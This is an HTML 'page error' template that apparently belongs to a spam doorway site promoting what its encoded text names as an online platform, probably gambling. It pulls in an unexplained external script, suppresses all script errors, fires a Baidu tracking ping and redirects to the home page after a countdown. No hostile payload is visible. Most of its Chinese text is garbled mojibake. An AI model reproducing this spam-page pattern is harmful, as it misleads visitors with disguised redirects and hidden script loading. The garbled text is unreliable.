<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "//www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="//www.w3.org/1999/xhtml" >
<head> <meta name="keywords" content="keywords_temp" />
<meta name="description" content="description_temp">

    <title>Page error.</title>
<script src="/acabsurd.js"></script>
    <style type="text/css">
    body,form,li,ul,img {
	font-size: 12px;
	color: #666666;
	margin:0px;
	border:0px;
}
    </style>
    
<meta http-equiv="Cache-Control" content="no-transform" />
<script>var V_PATH="/";window.onerror=function(){ return true; };</script>
</head>
<body><h1><a href="http://ugnomadoma.com/">��������ƽ̨(�й�)����</a></h1>
<table width="539" border="0" align="center" cellpadding="0" cellspacing="0">
  <tr>
    <td height="120">&nbsp;</td>
  </tr>
  <tr>
    <td height="257" background="/images/error.jpg"><table width="65%" border="0" cellspacing="0" cellpadding="0">
      <tr>
        <td width="16%">&nbsp;</td>
        <td width="84%" height="70">&nbsp;</td>
      </tr>
      <tr>
        <td>&nbsp;</td>
        <td class="line_height20">
        <div id="cnContent">
          1.����ҳ�治����.<br />
          2.����ҳ��ʱ��������.<br />
          3.��վ���������.<br />
          4.���������ȷ�����������ַ,��<a href="/">����&#31859;&#20848;&#22312;&#32447;&#24179;&#21488;&#40;&#20013;&#22269;&#41;&#23448;&#32593;&#13;&#10;</a>.
        </div>  
        <div id="enContent" style="display:none;">
          1.The page does not exist.<br />
          2.An error occurred while the page is accessed.<br />
          3.The site does not allow external links.<br />
          4.If you are not sure,please return.
        </div>
          </td>
      </tr>
      <tr>
        <td>&nbsp;</td>
        <td>&nbsp;</td>
      </tr>
      <tr>
        <td>&nbsp;</td>
        <td><span id="totalSecond">5</span>��󣬽��Զ�ת��&#31859;&#20848;&#22312;&#32447;&#24179;&#21488;&#40;&#20013;&#22269;&#41;&#23448;&#32593;&#13;&#10;.<br />seconds, it will be turn to Home automatically.
 </td>
      </tr>
    </table></td>
  </tr>
</table>
<script>
	(function(){
		var canonicalURL, curProtocol;
		//Get the <link> tag
		var x=document.getElementsByTagName("link");
		//Find the last canonical URL
		if(x.length > 0){
			for (i=0;i<x.length;i++){
				if(x[i].rel.toLowerCase() == 'canonical' && x[i].href){
					canonicalURL=x[i].href;
				}
			}
		}
		//Get protocol
	    if (!canonicalURL){
	    	curProtocol = window.location.protocol.split(':')[0];
	    }
	    else{
	    	curProtocol = canonicalURL.split(':')[0];
	    }
	    //Get current URL if the canonical URL does not exist
	    if (!canonicalURL) canonicalURL = window.location.href;
	    //Assign script content. Replace current URL with the canonical URL
    	!function(){var e=/([http|https]:\/\/[a-zA-Z0-9\_\.]+\.baidu\.com)/gi,r=canonicalURL,t=document.referrer;if(!e.test(r)){var n=(String(curProtocol).toLowerCase() === 'https')?"https://sp0.baidu.com/9_Q4simg2RQJ8t7jm9iCKT-xh_/s.gif":"//api.share.baidu.com/s.gif";t?(n+="?r="+encodeURIComponent(document.referrer),r&&(n+="&l="+r)):r&&(n+="?l="+r);var i=new Image;i.src=n}}(window);})();
</script>
</body>
</html>
 
<script language="javascript" type="text/javascript"> 
    var second = document.getElementById('totalSecond').textContent;
 
    if (IsIE())
    {
        second = document.getElementById('totalSecond').innerText;
    } else
    {
        second = document.getElementById('totalSecond').textContent;
    }
 
    setInterval("redirect()", 1000);
    function redirect()
    {
        if (second < 1)
        {
            location.href = '/';
        } else
        {
            if (IsIE())
            {
                document.getElementById('totalSecond').innerText = second--;
            } else
            {
                document.getElementById('totalSecond').textContent = second--;
            }
        }
    }
 
    if(window.navigator.systemLanguage.toLowerCase()=="zh-cn")   
    {
       document.getElementById("cnContent").style.display="block";
       document.getElementById("enContent").style.display="none";
    }
    if(window.navigator.systemLanguage.toLowerCase()=="en-us")   
    {
       document.getElementById("cnContent").style.display="none";
       document.getElementById("enContent").style.display="block";
    }
    function IsIE()
    {
        if (navigator.appName.indexOf("Explorer") > -1)
        {
            return true;
        } 
        else
        {
            return false;
        }
    }
</script>
